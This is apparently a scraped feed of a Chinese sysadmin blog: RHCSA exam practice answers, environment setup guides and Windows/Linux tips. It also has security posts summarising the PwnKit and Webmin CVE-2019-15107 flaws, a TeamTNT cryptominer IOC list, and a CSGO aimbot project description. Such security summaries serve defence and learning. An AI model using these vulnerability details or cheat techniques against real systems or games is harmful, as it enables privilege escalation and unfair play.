]]> linux RHCSA find exec 设置用户uid /archives/linux/RHCSA/set-uid.html RHCSA题目10：设置用户uid

在 mars.lab.example.com上执行

配置用户jacks，用户ID为3533。此用户的密码设置为redhat

Answer

id jacks
usermod -u 3533 jacks
echo redhat|passwd –stdin jacks

验证

id jacks
ssh jacks@mars

set-uid-0

]]> linux RHCSA usermod 文件设置ACL权限 /archives/linux/RHCSA/file-acl.html RHCSA练习题9: 设置 ACL文件权限

在 mars.lab.example.com 上执行

将文件 /etc/fstab 复制到 /var/tmp/fstab。配置 /var/tmp/fstab 的权限以满足如下条件：

文件/var/tmp/fstab由root用户所有
文件/var/tmp/fstab属于组root
文件/var/tmp/fstab应不能被任何人执行
用户lucy能够读取和写入/var/tmp/fstab
用户harry无法写入或读取/var/tmp/fstab
所有其他用户(当前或未来)能够读取/var/tmp/fstab

Answer

cp /etc/fstab /var/tmp/
setfacl -m u:lucy:rw,u:harry:- /var/tmp/fstab

验证

getfacl /var/tmp/fstab

file

]]> linux RHCSA setfacl getfacl AutoFS自动挂载NFS /archives/linux/RHCSA/autofs-mount-nfs.html RHCSA考题8：自动挂载NFS目录

在mars.lab.example.com上执行

以按照如下所述 自动挂载 远程用户的主目录：

classroom.example.com (172.25.254.254) NFS 目录 /rhome 自动挂载到用户lily预配置的主目录。
lily的主目录是 classroom.example.com:/rhome/lily
lily的主目录应自动挂载到本地 /rhome 下的 /rhome/lily 。
主目录必须可供其用户写入。
lily的密码是redhat

Answer

yum -y install autofs
echo "/rhome /etc/auto.nfs" > /etc/auto.master.d/lily.autofs
echo "lily -fstype=nfs,rw,sync classroom.example.com:/rhome/lily" > /etc/auto.nfs

systemctl restart autofs
systemctl enable autofs

验证

ssh lily@mars "df -hT"

autofs-mount-nfs-0

]]> linux RHCSA autofs nfs 配置NTP时间同步 /archives/linux/RHCSA/sync-ntp.html RHCSA考题7：配置NTP

在 mars.lab.example.com上执行

配置您的系统，使其成为 classroom.example.com 的 NTP 客户端。

考试时提示：

classroom.example.com 是 sidecar.lab.example.com 的DNS别名

Answer

vim /etc/chrony.conf

添加内容

server classroom.example.com iburst

systemctl restart chronyd

验证

chronyc sources -c

sync-ntp-0

]]> linux RHCSA ntp chrony 文件权限 /archives/linux/RHCSA/file-permissions.html RHCSA考题6：文件权限

在 mars.lab.example.com上执行

创建具有以下特征的协作目录 /home/test

/home/test 的组所有权是 admins
目录应当可被 admins 的成员读取、写入和访问，但任何其他用户不具这些权限。（当然 root用户有权访问系统上的所有文件和目录）
/home/test 中创建的文件自动继承 admins 组权限

Answer

mkdir /home/test
chgrp admins /home/test
chmod g=rwx,o=– /home/test
chmod g+s /home/test

验证

ssh lucy@mars 
echo 123231 > /home/test/123
ll /home/test/

file-permissions-0

]]> linux RHCSA 文件权限 chmod chgrp crontab计划任务 /archives/linux/RHCSA/crontab.html RHCSA考题5：计划任务crond

在 mars.lab.example.com上执行

为 lucy 用户配置一个计划任务，每隔 2 分钟执行 /bin/echo hiya

Answer

crontab -u lucy -e

内容

*/2 * * * * /bin/echo hiya

验证

crontab -u lucy –l

crontab-0

]]> linux RHCSA crontab Linux用户管理(添加用户，用户组，密码，登陆方式) /archives/linux/RHCSA/user-management.html RHCSA考题4：用户管理，添加用户，设置用户组，更改密码，设置登陆shell

在 mars.lab.example.com上执行创建下列用户组和组成员资格：

创建名为 admins 的组
用户lucy，作为次要组从属于admins
用户harry，作为次要组还从属于admins
用户jams，无权访问系统上的交互式shell,且不是admins的成员
lucy、 harry和jams的密码应当都是redhat

提示：

groupadd useradd -G/-s

Answer

groupadd admins
useradd -G admins lucy
useradd -G admins harry
useradd -s /sbin/nologin jams

echo redhat|passwd --stdin lucy
echo redhat|passwd --stdin harry
echo redhat|passwd --stdin jams

验证

tail -3 /etc/passwd
ssh lucy@mars  #密码redhat
ssh harry@mars
ssh jams@mars

user-management-0

]]> linux RHCSA useradd groupadd SeLinux和防火墙 /archives/linux/RHCSA/selinux-firewalld.html RHCSA考题3：SeLinux和防火墙

在 mars.lab.example.com上执行

非标准端口 82 上运行的Web服务器在提供内容时遇到问题。根据需要调试并解决问题，使其满足以下条件：

系统上的Web服务器能够提供/var/www/html中所有现有的HTML文件（注：不要删除或以其他方式改动现有的文件内容）
Web服务器在端口 82上提供此内容Web服务器在系统启动时 自动启动

提示：

httpd端口82，不是默认80,不在selinux和防火墙默认规则中，需要添加例外, semange port -l | grep http
/var/www/html/file1权限 restorecon
开启自启动 systemctl enable xxxx

Answer

#设置selinux
semanage port -a -t http_port_t -p tcp 82
#添加防火墙端口例外
firewall-cmd --add-port=82/tcp --zone=public --permanent
firewall-cmd --reload
#恢复文件selinux权限
restorecon -Rv /var/www/html/
#开机自启动
systemctl enable  httpd --now

验证

curl mars:82
curl mars:82/file1

selinux-firewalld-0

]]> linux RHCSA selinux firewalld 配置yum源 /archives/linux/RHCSA/yum-repo.html RHCSA考题二：配置yum源

在mars.lab.example.com配置YUM存储库，存储库地址

BaseOS http://content.example.com/rhel8.0/x86_64/dvd/BaseOS
AppStream http://content.example.com/rhel8.0/x86_64/dvd/AppStream

Answer:

编辑或者新建repo文件，这里选择编辑redhat.repo文件，

vim /etc/yum.repos.d/redhat.repo

内容

[BaseOS]
name=BaseOS
baseurl=http://content.example.com/rhel8.0/x86_64/dvd/BaseOS
enabled=1
gpgcheck=0
[AppStream]
name=AppStream
baseurl=http://content.example.com/rhel8.0/x86_64/dvd/AppStream
enabled=1
gpgcheck=0

验证：

yum makecache && yum list | wc -l

或者

yum repolist

yum-repo-0

]]> linux RHCSA yum repo源配置hostname和网络 /archives/linux/RHCSA/hostname-and-net.html RHCSA考题一：配置hostname和网络

在mars.lab.example.com上，将mars配置为具有以下网络配置：

主机名： mars.lab.example.com image
IP地址： 172.25.250.10
子网掩码：255.255.255.0
网关： 172.25.250.254
DNS： 72.25.250.254

提示

hostnamectl nmcli

Answer

设置hostname
- 方法一：
  hostnamectl set-hostname mars.lab.example.com
- 方法二：编写 hostname配置文件设置，
  vim /etc/hostname

设置网络

方法一：

nmcli connection show #查看网卡名，比如这里是 Wired connection1
nmcli connection modify "Wired connection1" \
ipv4.method manual \
ipv4.addresses 172.25.250.10/24 \
ipv4.gateway 172.25.250.254 \
ipv4.dns 172.25.250.254 \
connect.autoconnect yes
nmcli connection up "Wired connection1 "

方法二：编写网卡配置文件设置

vim /etc/sysconfig/network-scripts/ifcfg-Wired_connection1

ipaddr  172.25.250.20 改成172.25.250.10

nmcli connection reload
nmcli connection up "Wired connection1"

验证：

hostname
IP

ip a

图 1

或者

ssh root@mars

图 2

]]> linux RHCSA hostname nmcli RHCE考试安排和考试时间 /archives/linux/RHCSA/start.html 考试当天，大家带好 身份证 ，提前达到考场。正常情况，上午10:00开始考试。

考试时间1天：

上午 RHCSA EX200

下午 RHCE8 EX294

注意：

上午和下午邮箱要一致，姓名也要一致。邮箱用于接收成绩，姓名会显示在证书上

RHCSA

考试时间：2.5小时

请注意，考试过程中不能与其他考生交流，您也不得连接到其他考生的主机，测验系统及其网络会受到监控，不当使用可导致成绩判为零分。请执行下方列出的任务。在开始操作前，您不妨先通读整个列表。

这些项目将使用一个分数来评分，这些任务的总分为300分，您必须达到210分或以上才能获得认证。

在考试期间，除了您就坐位置的台式机之外，还将使用多个虚拟系统。您不具有台式机系统的root访问权，但具有对虚拟系统的完整root访问权

在本考试期间，您将操作下列虚拟系统：

系统	IP地址
mars.lab.example.com	172.25.250.10
venus.lab.example.com	172.25.250.11

您使用的系统属于DNS域lab.example.com。该域中的所有系统都位于172.25.250.0/255.255.255.0子网中，该子网中的所有系统都位于lab.example.com中。针对这些系统列出的IP地址是应该分配给系统的地址。您可能需要为一个或两个系统配置网络，以便能够通过上述地址访问您的地址

mars的root已经设置为redhat。除非另有指定，否则这将是用于访问其他系统和服务的密码。此外，除非另有指定，否则应将该密码用于您创建的什么问题帐户或者需要设置密码的任意服务

您的系统会在重新引导后进行评测，因此务必确保您实施的的所有配置和服务在重新引导后仍然保留。服务必须在没有人工干预的情况下启动。同样，本次考试使用的所有虚拟实例都必须能够重新引导至适当的多用户目标，而无需任何人工辅助。 在无法引导或无法进行无人干预引导的系统上完成的所有操作都将为零分 .

RHCE

考试时间： 4小时

请注意，考试过程中不能与其他考生交流，您也不得连接到其他考生的主机，测验系统及其网络会受到监控，不当使用可导致成绩判为零分。请执行下方列出的任务。在开始操作前，您不妨先通读整个列表。这些项

目将使用一个分数来评分，这些任务的总分为300分，您必须达到210分或以上才能获得认证。

在考试期间，除了您就坐位置的台式机之外，还将使用多个虚拟系统。您不具有台式机系统的root访问权，但具有对虚拟系统的完整root访问权

在本考试期间，您将操作下列虚拟系统

系统	IP地址	角色
bastion.lab.example.com	172.25.250.254	Ansible control node
workstation.lab.example.com	172.25.250.9	Ansible managed node
servera.lab.example.com	172.25.250.10	Ansible managed node
serverb.lab.example.com	172.25.250.11	Ansible managed node
serverc.lab.example.com	172.25.250.12	Ansible managed node
serverd.lab.example.com	172.25.250.13	Ansible managed node

账户信息这些系统的IP地址采用静态设置。 请勿更改这些设置 。主机名称解析已配置为解析上方列出的完全限定主机名，同时也解析主机短名称

所有系统的root密码是redhat。请勿更改root密码。除非另有指定，否则这将是用于访问其他系统和服务的密码。此外，除非另有指定，否则此密码也应用于您创建的所有帐户或者任何需要设置密码的服务。为方便起见，所有系统上已预装了SSH密钥，允许在不输入密码的前提下通过SSH进行root访问。请勿对系统上的root SSH配置文件进行任何修改。Ansible控制节点上已创建了用户帐户 student。此帐户预装了SSH密钥，允许在Ansible控制节点和各个Ansible受管节点之间进行SSH登录。请勿对系统上的student SSH配置文件进行任何修改。您可以从root帐户使用su访问此用户帐户。

其他信息

一些考试项目可能需要修改Ansible主机清单。您要负责确保所有以前的清单组和项目保留下来，与任何其他更改共存。您还要有确保清单中所有默认的组和主机保留您进行的任何更改。考试系统上的防火墙默认为不启用， SELinux则处于强制模式。如果需要安装其他软件，您的物理系统和Ansible控制节点可能已设置为指向content上的下述存储库：

http://content.example.com/rhel8.0/x86_64/dvd/BaseOS

http://content.example.com/rhel8.0/x86_64/dvd/AppStream

一些项目需要额外的文件，这些文件已在以下位置提供：

http://materials.example.com/cd/exam_rhce8

产品文档可从以下位置找到：

http://materilas.example.com/docs/

其他资源也进行了配置，供您在考试期间使用。关于这些资源的具体信息将在需要这些资源的项目中提供

评测

除非另有指定，否则您的所有工作（包括Ansible playbook、配置文件和主机清单等）应当保存

在控制节点上的目录/home/student/ansible中，并且应当归student用户所有。所有Ansible相关的命令应当由student用户从Ansible控制节点上的这个目录运行。

请注意，在评分之前，您的Ansible受管节点系统将重置为考试开始时的初始状态，您编写的Ansible playbook将通过以student用户身份从控制节点上的目

录/home/student/ansible目录运行来应用。在playbook运行后，系统会对您的受管节点进行评估，以判断它们是否按照规定进行了配置。

]]> linux RHCSA RHCSA考试时间 AI爆头-使用MoveNet玩FPS游戏CSGO /archives/python/use-movenet-play-fps-game.html 前段时间出于兴趣，弄了个yolo v5 训练游戏中目标并进行射击的小程序，后面看到movenet，也想尝试下，我是一个初学者，也没找到其他和fps相关的项目来做参考，就参照movenet给的项目代码改了一下，后面测了下还行，当然也有需要改进的地方，不足之处欢迎指正

代码总共100多行，借助于tensorflow框架，方便很多，实际使用过程中，中近距离没有问题，但是远距离识别率有点低，后期考虑再训练下模型

识别对比和后期功能完善：

检测时间，yolov5在3-8ms左右，movenet在10-15ms，
使用pyautogui或mss进行截图，然后截取区域进行检测，时间大约在10-35ms不等，考虑其他更快的截图方式
yolov5 通过GitHub给的模型训练自己的模型比较方便，labelimg 进行标注然后进行训练即可，比较方便快捷。movenet模型训练方法还在学习和寻找

movenet 项目介绍和使用都比较详细，安装tensorflow2.0框架后，调用和使用都比较方便

movenet 官网项目地址

基于原代码删减后，只保留了检测和显示两个函数，添加了截图和鼠标自动瞄准

★ GitHub项目地址

环境搭建可以参考另外一篇文章

movenet环境搭建

YOLO v5项目地址

FPSGame-autoshot

图 0
图 1
图 2

]]> python AI爆头 movenet CSGO fps 游戏 MoveNet环境手把手搭建TensorFlow+cuda+cudnn+zlib /archives/python/python-movenet-env-build-md.html movenet需要使用tensorflow框架和显卡驱动的支持，环境的搭建可以通过anacanda一键搭建，但对于我这个初学者，比较喜欢需要什么安装什么来一步步搭建环境主要需要这么几个：

movenet模型（可在线下载） opencv-python tensorflow tensorflow-gpu tensorflow_docs tensorflow_hub cuda cudnn zlib

1. movenet介绍和使用示例

MoveNet: Ultra fast and accurate pose detection model

2. 安装扩展

opencv-python , tensorflow , tensorflow-gpu , tensorflow_docs , tensorflow_hub 都可以通过pip进行安装

pip install opencv-python tensorflow tensorflow-gpu tensorflow_docs tensorflow_hub

如需安装特定版本可以在模块后面加上== ，比如 tensorflow==2.7.1

如需查看现在安装的模块信息，可以通过 pip show 模块名进行查看，比如 pip show tensorflow

3、cuda toolkit 下载地址

发行版本列表

https://developer.nvidia.com/cuda-toolkit-archive

根据自己的系统下载，比如Windows10，cuda11.6.2

图 0
图 1

安装的话一路默认即可

4、cuDNN下载，可能需要登录和验证

developer.nvidia.com/rdp/cudnn-archive

下载后是压缩包，需要把压缩包里面的文件解压到cuda安装路径的对应目录，一般默认在

C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA

图 2

5、zlib下载和安装

zlib下载地址

www.winimage.com/zLibDll/zlib123dllx64.zip

安装zlib，下载后解压到一个目录，然后把目录添加到系统path环境变量中，cuDNN也可以用同样的方法

图 3

图 4

图 5

6、cuDNN和cuda安装和说明文档

https://docs.nvidia.com/deeplearning/cudnn/

总结

1、python ,tensorflow,opencv ,cuda等的版本

可以用新的，不必要非要用老的或者指定版本，通过pip安装默认版本即可

2、not found cudnn_ops_infer64_8.dll 或者not found cudnn_cnn_infer64_8.dll

一般原因是没有安装cudnn或者没有设置cudnn环境变量

3、could not load library cudnn_cnn_infer64_8.dll error code 126或者

could not load library cudnn_cnn_infer64_8.dll error code 193原因是zlib没有安装或者没有设置zlib目录环境变量，

通过如上一些步骤，基础环境算是部署好了，现在可以测试下movenet是否正常

使用vscode 打开movenet提供的代码，

www.tensorflow.org/hub/tutorials/movenet

这里为了验证做了精简

https://github.com/urldecode/AutoShot-MoveNet

图 6

图片路径和模型路径可根据自己的实际情况修改，模型为手动下载到本地加载，在线加载模型会出错

图 7

效果如图

图 8
图 9
图 10
图 11

]]> python Movenet cuda cudnn zlib PHP测试MySQL数据库连接是否正常 /archives/mysql/php-test-mysql-connect.html 要测试 PHP 与 MySQL 数据库的连接是否正常，你可以编写一个简单的 PHP 脚本来检查连接状态。如果连接成功，则表明 PHP 能够正常连接到 MySQL 数据库；如果连接失败，脚本会输出错误信息。

下面是一个简单的 PHP 脚本示例，用于测试 MySQL 数据库的连接。

1. 使用 `mysqli` 扩展

这是使用 mysqli 扩展进行 MySQL 连接测试的 PHP 脚本：

<?php
$servername = "localhost";  // MySQL 服务器主机名（通常是localhost）
$username = "your_username"; // MySQL 用户名
$password = "your_password"; // MySQL 密码
$dbname = "your_database";   // 需要连接的数据库名

// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
echo "连接成功";
?>

2. 使用 `PDO` 扩展

这是使用 PHP 数据对象（PDO）扩展进行 MySQL 连接测试的 PHP 脚本：

<?php
$dsn = 'mysql:host=localhost;dbname=your_database'; // 数据源名称
$username = 'your_username';  // MySQL 用户名
$password = 'your_password';  // MySQL 密码

try {
    $dbh = new PDO($dsn, $username, $password);
    echo "连接成功";
} catch (PDOException $e) {
    echo "连接失败: " . $e->getMessage();
}
?>

3. 测试连接

将上述任意一个脚本保存为 test_connection.php，并将其放置在你的服务器（如 Apache 或 Nginx）能够访问的目录中，例如 htdocs 或 www 目录。

然后，通过浏览器访问该脚本：

http://your-server-ip-or-domain/test_connection.php

4. 检查结果

如果连接成功，页面将显示“连接成功”。
如果连接失败，页面将显示错误信息，指明为什么连接失败。

常见连接失败原因

数据库主机名不正确：通常应为 localhost，但如果数据库在远程服务器上，请使用该服务器的 IP 地址或域名。
用户名或密码错误：确保你提供了正确的 MySQL 用户名和密码。
数据库不存在：确保指定的数据库名存在。
MySQL 服务未启动：确保 MySQL 服务正在运行。
防火墙设置：如果你连接的是远程 MySQL 服务器，确保防火墙允许访问 MySQL 的端口（默认是 3306）。

]]> TeamTNT挖矿木马变种再袭 /archives/security/TeamTNT-trojans.html 最近遇到TeamTNT挖矿木马，

新建了hilde用户，top ps等命令被修改，挖矿进程被隐藏，

这里有一篇详细的分析文章，写得很好，放此收藏

TeamTNT挖矿木马变种再袭，影响上千云主机，应用腾讯云SOC可轻松处置 (qq.com)

图 0

特点：

在清除竞品挖矿进程后，使用带有“TeamTNT is watching you!”字样的LOCKFILE字符串覆盖相关进程的源文件；
通过计划任务、系统服务、用户profile文件等多种方式进行持久化；
篡改系统ps、top、pstree等命令，隐藏自身木马进程；
篡改系统与重启相关的命令和服务，防止用户重启主机；
改用Redis未授权访问漏洞对云服务器进行横向攻击传播

挖矿木马相关地址：

DOMAIN： oracle.zzhreceive.top xmr-asia1.nanopool.org （矿池） gulf.moneroocean.stream（矿池） donate.v2.xmrig.com（矿池）

MD5: bf68dfba47df6c6023ce82686ce68429 58426b3626aea9d1f96c7b8d18ac5ad0 38ba92aafbe6e0f8917eef0eebb624a8 94a3ea919da87035eae05403c00782fd

URL: hxxp://oracle.zzhreceive.top/b2f628/idcheck/ hxxp://oracle.zzhreceive.top/b2f628/cryptostart hxxp://oracle.zzhreceive.top/b2f628/cryptonotfount hxxp://oracle.zzhreceive.top/b2f628/authfailed hxxp://oracle.zzhreceive.top/b2f628/authok hxxp://oracle.zzhreceive.top/b2f628/authfailedroot hxxp://oracle.zzhreceive.top/b2f628/authokroot hxxp://85.214.149.236:443/sugarcrm/themes/ default/images/mod.jpg hxxp://85.214.149.236:443/sugarcrm/themes/ default/images/stock.jpg hxxps://github.com/xmrig/xmrig/releases/ download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz hxxp://oracle.zzhreceive.top/b2f628/b.sh hxxp://oracle.zzhreceive.top/b2f628/father.jpg hxxp://oracle.zzhreceive.top/b2f628/cf.jpg hxxp://oracle.zzhreceive.top/b2f628/cf.jpg hxxp://oracle.zzhreceive.top/ b2f628fff19fda999999999/b.sh hxxp://oracle.zzhreceive.top/ b2f628fff19fda999999999/iss.sh hxxp://oracle.zzhreceive.top/ b2f628fff19fda999999999/1.0.4.tar.gz hxxp://oracle.zzhreceive.top/b2f628/p.tar hxxp://oracle.zzhreceive.top/b2f628/scan hxxp://oracle.zzhreceive.top/b2f628/rss.sh

钱包地址： 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZW i44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9 N5PepeajfmKp1X71EW7jx4Tpz.pokemon6

]]> security TeamTNT 挖矿木马 Windows通过sc命令手动创建服务 /archives/windows/use-sc-create-svc.html 在 Windows 中，你可以使用 sc 命令手动创建一个服务。这通常用于将一个可执行文件（例如一个应用程序、脚本或批处理文件）注册为 Windows 服务，以便它可以在后台运行并通过服务管理器进行控制（启动、停止、暂停等）。

以下是使用 sc 命令创建 Windows 服务的步骤：

1. 打开命令提示符

以管理员身份打开命令提示符：

按下 Win + X，选择“命令提示符（管理员）”或者“Windows PowerShell（管理员）”。
或者按下 Win + R，输入 cmd，然后按 Ctrl + Shift + Enter 以管理员身份运行。
可以使用 sc /? 来查看详细下面是一些常见的命令

2. 使用 `sc create` 命令创建服务

你可以使用以下语法来创建服务：

sc create "YourServiceName" binPath= "C:\Path\To\YourExecutable.exe" start= auto

“YourServiceName”: 服务的名称，可以自定义，例如 "MyService"。
binPath= “C:\Path\To\YourExecutable.exe”: 服务指向的可执行文件的路径。注意路径需要完整并且带有引号。
start= auto: 指定服务的启动类型。可以是以下几种类型：
- auto: 随系统启动自动启动服务。
- demand: 手动启动服务（默认类型）。
- disabled: 禁用服务。
- delayed-auto: 系统启动后延迟启动。

注意

在 sc 命令中，等号 = 后面需要有一个空格。

3. 示例

例如，假设你有一个名为 MyApp.exe 的应用程序，位于 C:\MyApp\MyApp.exe，并希望将其创建为名为 MyService 的服务，并且服务设置为自动启动：

sc create "MyService" binPath= "C:\MyApp\MyApp.exe" start= auto

4. 查看服务

创建服务后，你可以使用 services.msc 打开服务管理器来查看和管理这个服务。

5. 启动服务

你可以使用以下命令启动服务：

sc start "MyService"

6. 删除服务

如果你需要删除服务，可以使用以下命令：

sc delete "MyService"

7. 停止服务

sc stop "ServiceName"

8. 设置开机启动

sc config "MyService" start= auto

9. 查询服务配置信息

要查询某个服务的配置信息，可以使用 sc qc 命令（qc 代表 “query configuration”）：

sc qc "ServiceName"

10. 暂停服务

sc pause "ServiceName"

11. 继续服务

sc continue "ServiceName"

10. 其他常用选项

displayname= “Your Display Name”: 设置服务的显示名称，它在服务管理器中显示。
depend= “Service1/Service2”: 设置服务依赖项，指定服务启动时需要先启动的服务。
obj= “LocalSystem”: 指定服务运行的账户，LocalSystem 是默认账户。
type= own: 指定服务的类型，own 表示独立服务。

示例：带有更多选项的命令

sc create "MyService" binPath= "C:\MyApp\MyApp.exe" displayname= "My Application Service" start= auto obj= "LocalSystem" type= own

以上命令创建了一个名为 MyService 的服务，指向 C:\MyApp\MyApp.exe，并设置为自动启动，并且显示名称为 My Application Service。

通过这些步骤，你可以使用 sc 命令在 Windows 中手动创建并管理服务。

]]> windows sc windows创建服务 CVE-2021-4034 /archives/security/cve-2021-4034.html 1. 漏洞简述

Polkit是一个在各类Linux及Unix 操作系统中被广泛用于控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式，用户可以使用 polkit 以root用户权限执行命令，只要在需要执行的命令前面附加上：pkexec。成功利用CVE-2021-4034，也即Polkit本地提权漏洞允许任何非特权用户在未经漏洞修补的主机上获得 root 权限。

2. 影响面简述

漏洞在多套环境下都得到验证，任何具备普通权限的用户均能够经简单的工具利用该漏洞，获取完整的root权限。
该漏洞在以默认参数安装的 Ubuntu、Debian、Fedora、CentOS等常见Linux发行版上存在，能够经简单的工具利用获得完整的 root 权限。
其他 Linux 发行版同样可能容易受到攻击（例如：Solaris，FreeBSD等，但OpenBSD已被明确证明不可利用），攻击者可以经简单的工具利用该漏洞。
此漏洞已经在代码中存在并隐藏了 12 年多，影响自 2009 年 5 月第一个版本以来的所有 pkexec 版本（commit c8c3d83）。
该漏洞POC（利用代码）已经由Github等平台公开传播数日，攻击者利用成本极低

3. 复现截图

未修复之前

gcc xxxxx -o exp
图 0

修复之后
图 1

4. 原理简述

pkexec 的 main() 函数在开头（源码 534-568 行）处理命令行参数，并在 PATH 环境变量的目录中搜索要执行的程序（如果其路径不是绝对路径）。此时，如果命令行参数 argc 的数量为 0，则传递给 execve() 的参数列表 argv 为{NULL}，也即 argv[0] 为 NULL，将会导致：

在第 534 行，整数 n 永久设置为 1；

在第 610 行，从 argv[1] 越界读取指针路径；

在第 639 行，指针 s 被越界写入 argv[1]。

这种越界写入允许我们将一个“不安全”的环境变量（例如，LD_PRELOAD）重新引入 pkexec 的环境。这些“不安全”变量通常在调用 main() 函数之前从 SUID 程序的环境中删除（通过 ld.so）。

5. 修复建议

若操作系统厂商/或社区提供了漏洞修复补丁，则优先通过版本升级应用这些补丁。
若未发布相关补丁/或情形不容许版本升级操作，则使用命令：chmod 0755 /usr/bin/pkexec 修改polkit可执行文件的权限（删除SUID位）。
做好信息资产漏洞评估与管理工作，避免攻击者通过其他漏洞间接利用PWNKIT漏洞提升权限，造成不必要的损失。

其他：

arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) (github.com)

]]> security 2022-01-28 14:17 polkit 网址重写扩展 Redirector /archives/tools/url-redirector.html 有时候遇到有的网站图片网址类似

https://xxxx/xxx-oo/xxx/xxx/xx/xxx.jpeg.html

实际图片地址是

https://xxxx/oo/xxx/xxx/xx/xxx.jpeg

加粗部分为差异部分，本意是直接查看图片，但是第一个连接可能会有广告等其他，我们需要一些插件来完成url-rewrite

adge上面直接搜索Redirector
chrome搜索Requestly

匹配原始地址为`*/xxx-oo/*.jpeg.html`重写后的地址为  `$1/oo/$2.jpeg`

图片例子重写规则，
匹配原始地址为 */x-o/*.jpeg.html
重写后的地址为 $1/o/$2.jpeg
$1,$2的位置分别对应*号位置，
$3,$4也依次类推，

图 0

]]> tools 网址重写 Redirector vscode中打开tensorboard查看指标 /archives/python/vscode-open-tensorboard.html 有时候训练好模型，想看下图形界面结果，

1.安装TensorBoard 插件

在 VSCode 中，点击扩展图标（侧栏中的方块图标），搜索并安装 “TensorBoard” 插件（由 Microsoft 提供）

2.启动 TensorBoard ：

按下 Ctrl+Shift+P（或 Cmd+Shift+P 在 macOS 上）打开命令面板。
输入 python: launch tensorboard 并按下回车。
VSCode 会提示你选择日志目录 (logdir)，这是 TensorBoard 读取数据的目录。
选择或输入你的日志目录路径后，TensorBoard 会在 VSCode 内部启动，并在一个新的标签页中显示其界面

]]> python vscode tensorboard python pip 配置国内源 /archives/python/python-pip-repo.html 参考：https://mirrors.tuna.tsinghua.edu.cn/help/pypi/

国内pip源

清华大学：https://pypi.tuna.tsinghua.edu.cn/simple

阿里云：http://mirrors.aliyun.com/pypi/simple/

永久使用源

Windows或者Linux可以使用下面的命令进行源的设置

python -m pip install --upgrade pip
pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple

图 0

临时使用源

pip install -i https://pypi.tuna.tsinghua.edu.cn/simple numpy
pip install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn

参数“–trusted-host”表示信任，如果上一个提示不受信任，就使用这个

使用上面命令后，下面的可忽略

、Linux平台

mkdir ~/.pip
cd ~/.pip
touch pip.conf
vi ~/.pip/pip.conf

填入如下内容，:wq保存退出

[global] 
index-url = https://pypi.tuna.tsinghua.edu.cn/simple
[install]
trusted-host = https://pypi.tuna.tsinghua.edu.cn  
# trusted-host 此参数是为了避免麻烦，否则使用的时候可能会提示不受信任

windows平台 C:\Users\Administrator\AppData\Roaming\pip\pip.ini pip.ini 内容

[global]
index-url = https://pypi.tuna.tsinghua.edu.cn/simple
[install]
trusted-host = https://pypi.tuna.tsinghua.edu.cn

]]> python pip国内源 python CVE-2019-15107 webmin远程命令执行 /archives/security/cve-2019-15107.html 概述

Webmin 被爆出1.920版本之前存在一个远程命令执行漏洞（CVE-2019-15107），当用户开 Webmin 密码重置功能后，攻击者利用该漏洞可在易受损系统中执行任意命令，进而获取系统 Shell。由于Webmin 中 Password_Change.cgi 在接收请求的处理过程中，old 参数存在命令注入漏洞，可被攻击者恶意利用。

影响版本

Webmin 1.920及以下版本。

漏洞复现

图 0

2、利用 POC 进行验证，发现有回显

图 1

3、直接查看 Flag

图 2

文章地址Webmin 远程命令执行漏洞（CVE-2019-151070） (fofapro.github.io)

]]> security 2021-11-06 20:09 webmin Kali切换桌面环境 /archives/linux/kali-change-desktop-env.html 使用如下命令查看和切换桌面环境

update-alternatives --config x-session-manager

图 0

输入对应的编号即可，比如我这里有gnome和xfce4桌面环境，我输入编号3，然后reboot重启，就可以切换成xfce4桌面环境了

]]> linux kali 桌面环境 windows通过远程桌面连接kali linux /archives/windows/use-rdp-connect-kali-linux.html

安装xfce4

apt-get install xfce4

安装tightvnc 和xrdp

apt-get purge tightvnc xrdp 
apt-get install tightvncserver xrdp

启动xrdp

systemctl enable xrdp --now

图 0

添加防火墙例外

ufw allow 3389

远程桌面（开始键+R，输入mstsc，回车）
图 1
图 2

网上有的需要修改配置文件，我的桌面一开始是gnome的，没有修改配置，安装软件以后直接就可以连接了

]]> windows kali xrdp rdp linux 批量压缩文件夹 /archives/tools/batch-compress-file.html windows下面可以使用zip或者7z ，

7zip下载地址 https://www.7-zip.org/a/7z2408-x64.exe

假设我们有个文件夹里面有很多个文件夹，我们需要单独压缩每一个文件夹作为一个压缩文件下面的简单命令可以帮助我们实现

下面几个简单的例子

进入到要压缩文件的目录执行

for /d %i in (*) do 7z a "%i.zip" "%i"

如果使用bat批处理，需要把% 修改为%%

for /d %%i in (*) do 7z a "%%i.zip" "%%i"

使用powershell的Compress-Archiv实现

$sourcePath = "C:\Path\To\Your\Folders"   # 要压缩的文件夹路径
$outputPath = "C:\Path\To\Save\CompressedFiles"   # 保存压缩文件的路径

# 遍历所有子文件夹并压缩每个文件夹为单独的ZIP文件
Get-ChildItem -Path $sourcePath -Directory | ForEach-Object {
    $folderName = $_.Name
    $zipFilePath = Join-Path -Path $outputPath -ChildPath "$folderName.zip"
    Compress-Archive -Path $_.FullName -DestinationPath $zipFilePath
}

linux下面压缩方式比较多，这里用个常用的压缩格式 tar.gz

#!/bin/bash

# 设置要压缩的文件夹路径
folder_path="/path/to/your/folders"

# 设置压缩文件保存的路径
output_path="/path/to/save/compressed/files"

# 遍历文件夹
for folder in "$folder_path"/*; do
    if [ -d "$folder" ]; then
        folder_name=$(basename "$folder")
        tar_file="$output_path/$folder_name.tar.gz"
        tar -czf "$tar_file" -C "$folder_path" "$folder_name"
    fi
done

]]> tools 批量压缩文件夹 7z 非法网站-黑SEO /archives/security/guess-my-agent.html 网站非法信息，日益更新，在对方知道我们检测方法以后会立马修改策略，让我们单一的检测方法失效，下面说一些常见非法信息排查检测方法（不进入客户服务器）一些黑链SEO，会植入一些js文件，js文件内容主要是检测UA，是否为百度蜘蛛，或者谷歌蜘蛛，国内主要是百度蜘蛛，百度蜘蛛的常见UA是

Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

谷歌蜘蛛的常见UA是

